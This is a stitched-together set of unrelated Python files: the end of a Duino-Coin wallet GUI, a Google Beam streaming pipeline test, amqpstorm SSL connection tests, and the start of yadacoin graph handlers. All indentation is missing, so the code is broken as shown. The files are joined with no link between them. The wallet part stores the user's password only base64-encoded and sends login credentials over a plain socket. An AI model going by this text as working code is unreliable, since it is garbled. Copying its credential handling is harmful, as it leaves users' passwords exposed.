if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if (
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0
and notificationsEnabled
):
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += f"{str(row[1])} {row[2]} DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr),
icon="warning",)
if MsgBox == "yes":
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(2)
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv(128).decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
with urlopen(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") as content:
content = content.read().decode().splitlines()
pool_address = content[0]
pool_port = content[1]
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
except IndexError:
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
streaming_beam_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import os
import subprocess as sp
import tempfile
import time
import uuid
from google.cloud import bigquery
from google.cloud import pubsub
import pytest
PROJECT = os.environ["GCLOUD_PROJECT"]
UUID = str(uuid.uuid4()).split('-')[0]
DATASET = 'beam_samples_{}'.format(UUID)
TABLE = 'streaming_beam_sql'
TOPIC = 'messages-{}'.format(UUID)
SUBSCRIPTION = TOPIC
@pytest.fixture
def topic_path():
publisher_client = pubsub.PublisherClient()
topic_path = publisher_client.topic_path(PROJECT, TOPIC)
try:
publisher_client.delete_topic(topic_path)
except Exception:
pass
topic = publisher_client.create_topic(topic_path)
yield topic.name
publisher_client.delete_topic(topic_path)
@pytest.fixture
def subscription_path(topic_path):
subscriber = pubsub.SubscriberClient()
subscription_path = subscriber.subscription_path(PROJECT, SUBSCRIPTION)
try:
subscriber.delete_subscription(subscription_path)
except Exception:
pass
subscription = subscriber.create_subscription(subscription_path, topic_path)
yield subscription.name
subscriber.delete_subscription(subscription_path)
@pytest.fixture
def dataset():
bigquery_client = bigquery.Client(project=PROJECT)
dataset_id = '{}.{}'.format(PROJECT, DATASET)
dataset = bigquery.Dataset(dataset_id)
dataset = bigquery_client.create_dataset(dataset, exists_ok=True)
yield '{}:{}'.format(PROJECT, DATASET)
bigquery_client.delete_table('{}.{}'.format(DATASET, TABLE), not_found_ok=True)
bigquery_client.delete_dataset(DATASET, not_found_ok=True)
def _infinite_publish_job(topic_path):
publisher_client = pubsub.PublisherClient()
while True:
future = publisher_client.publish(
topic_path,
b'{"url": "https://beam.apache.org/", "review": "positive"}')
future.result()
time.sleep(1)
def test_dataflow_flex_templates_pubsub_to_bigquery(dataset, topic_path,
subscription_path):
# Use one process to publish messages to a topic.
publish_process = mp.Process(target=lambda: _infinite_publish_job(topic_path))
# Use another process to run the streaming pipeline that should write one
# row to BigQuery every minute (according to the default window size).
pipeline_process = mp.Process(target=lambda: sp.call([
'python', 'streaming_beam.py',
'--project', PROJECT,
'--runner', 'DirectRunner',
'--temp_location', tempfile.mkdtemp(),
'--input_subscription', subscription_path,
'--output_table', '{}.{}'.format(dataset, TABLE),
'--window_interval', '5',
]))
publish_process.start()
pipeline_process.start()
pipeline_process.join(timeout=30)
publish_process.join(timeout=0)
pipeline_process.terminate()
publish_process.terminate()
# Check for output data in BigQuery.
bigquery_client = bigquery.Client(project=PROJECT)
query = 'SELECT * FROM {}.{}'.format(DATASET, TABLE)
query_job = bigquery_client.query(query)
rows = query_job.result()
assert rows.total_rows > 0
for row in rows:
assert row['score'] == 1
# TODO:Testcase using Teststream currently does not work as intended.
# The first write to BigQuery fails. Have filed a bug. The test case
# to be changed once the bug gets fixed.
'''
@mock.patch("apache_beam.Pipeline", TestPipeline)
@mock.patch(
"apache_beam.io.ReadFromPubSub",
lambda subscription: (
TestStream()
.advance_watermark_to(0)
.advance_processing_time(60)
.add_elements([TimestampedValue(
b'{"url": "https://beam.apache.org/", "review": "positive"}',
1575937195)])
.advance_processing_time(60)
.add_elements([TimestampedValue(
b'{"url": "https://beam.apache.org/", "review": "positive"}',
1575937255)])
.advance_watermark_to_infinity()
),
)
def test_dataflow_flex_templates_pubsub_to_bigquery(dataset):
streaming_beam.run(
args=[
"--project", PROJECT,
"--runner", "DirectRunner"
],
input_subscription="unused",
output_table='{}:{}.{}'.format(PROJECT, DATASET, TABLE),
)
# Check for output data in BigQuery.
bigquery_client = bigquery.Client(project=PROJECT)
query = 'SELECT * FROM {}.{}'.format(DATASET, TABLE)
query_job = bigquery_client.query(query)
rows = query_job.result()
assert rows.total_rows > 0
'''
|
reliability_tests.py
|
import ssl
import threading
import time
from amqpstorm import Connection
from amqpstorm import UriConnection
from amqpstorm.tests import CAFILE
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import SSL_HOST
from amqpstorm.tests import SSL_URI
from amqpstorm.tests import USERNAME
from amqpstorm.tests.functional.utility import TestFunctionalFramework
from amqpstorm.tests.functional.utility import setup
class SSLReliabilityFunctionalTests(TestFunctionalFramework):
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_new_connection_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
for _ in range(5):
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, timeout=1)
self.channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(self.channel), 1)
self.channel.queue.declare(self.queue_name)
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.channel.close()
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_close_connection_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, timeout=1, lazy=True)
for _ in range(5):
self.connection.open()
channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(channel), 1)
channel.queue.declare(self.queue_name)
channel.close()
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=False)
def test_functional_ssl_open_close_channel_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
for _ in range(25):
channel = self.connection.channel()
# Verify that the Channel has been opened properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_open)
# Channel id should be staying at 1.
self.assertEqual(int(channel), 1)
channel.close()
# Verify that theChannel has been closed properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_closed)
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_multiple_channels(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, lazy=True)
for _ in range(5):
channels = []
self.connection.open()
for index in range(3):
channel = self.connection.channel()
channels.append(channel)
# Verify that the Channel has been opened properly.
self.assertTrue(channel.is_open)
self.assertEqual(int(channel), len(channels))
self.connection.close()
@setup(new_connection=False, queue=False)
def test_functional_ssl_close_performance(self):
"""Make sure closing a connection never takes longer than ~1 seconds.
:return:
"""
for _ in range(10):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, timeout=60, port=5671, ssl=True,
ssl_options=ssl_options)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False)
def test_functional_ssl_uri_connection(self):
self.connection = UriConnection(SSL_URI)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
@setup(new_connection=False)
def test_functional_ssl_uri_connection_with_context(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = UriConnection(SSL_URI, ssl_options=ssl_options)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
class PublishAndConsume1kWithSSLTest(TestFunctionalFramework):
messages_to_send = 1000
messages_consumed = 0
lock = threading.Lock()
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
def consume_messages(self):
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
for message in channel.build_inbound_messages(
break_on_empty=False):
self.increment_message_count()
message.ack()
if self.messages_consumed == self.messages_to_send:
break
def increment_message_count(self):
with self.lock:
self.messages_consumed += 1
@setup(new_connection=False, queue=False)
def test_functional_publish_1k_with_ssl(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
self.channel = self.connection.channel()
self.channel.queue.declare(self.queue_name)
publish_thread = threading.Thread(target=self.publish_messages, )
publish_thread.daemon = True
publish_thread.start()
for _ in range(4):
consumer_thread = threading.Thread(target=self.consume_messages, )
consumer_thread.daemon = True
consumer_thread.start()
start_time = time.time()
while self.messages_consumed != self.messages_to_send:
if time.time() - start_time >= 60:
break
time.sleep(0.1)
for channel in list(self.connection.channels.values()):
channel.stop_consuming()
channel.close()
self.assertEqual(self.messages_consumed, self.messages_to_send,
'test took too long')
class Consume1kWithSSLUntilEmpty(TestFunctionalFramework):
messages_to_send = 1000
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
@setup(new_connection=False, queue=True)
def test_functional_consume_with_ssl_until_empty(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
self.channel = self.connection.channel()
self.channel.queue.declare(self.queue_name)
self.channel.confirm_deliveries()
self.publish_messages()
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
message_count = 0
for message in channel.build_inbound_messages(break_on_empty=True):
message_count += 1
message.ack()
result = channel.queue.declare(self.queue_name, passive=True)
self.assertEqual(result['message_count'], 0)
self.assertEqual(message_count, self.messages_to_send,
'not all messages consumed')
channel.close()
|
graphhandlers.py
|
"""
Handlers required by the graph operations
"""
import base64
import hashlib
import json
import os
import time
import requests
from bitcoin.wallet import P2PKHBitcoinAddress
from coincurve.utils import verify_signature
from eccsnacks.curve25519 import scalarmult_base
from logging import getLogger
from threading import Thread
from yadacoin.basehandlers import BaseHandler
from yadacoin.blockchainutils import BU
from yadacoin.fastgraph import FastGraph
from yadacoin.graph import Graph
from yadacoin.graphutils import GraphUtils as GU
from yadacoin.transaction import TransactionFactory, Transaction, InvalidTransactionException, \
InvalidTransactionSignatureException, MissingInputTransactionException
from yadacoin.transactionutils import TU
from yadacoin.transactionbroadcaster import TxnBroadcaster
from yadacoin.peers import Peer
class GraphConfigHandler(BaseHandler):
async def get(self):
if int(self.config.web_server_port) == 443:
peer = "https://{}:{}".format(self.config.web_server_host, self.config.web_server_port)
else:
peer = "http://{}:{}".format(self.config.web_server_host, self.config.web_server_port)
yada_config = {
"baseUrl": "{}".format(peer),
"transactionUrl": "{}/transaction".format(peer),
"fastgraphUrl": "{}/post-fastgraph-transaction".format(peer),
"graphUrl": "{}".format(peer),
"walletUrl": "{}/get-graph-wallet".format(peer),
"loginUrl": "{}/login".format(peer),
"registerUrl": "{}/create-relationship".format(peer),
"authenticatedUrl": "{}/authenticated".format(peer),
"logoData": ''
}
return self.render_as_json(yada_config)
class BaseGraphHandler(BaseHandler):
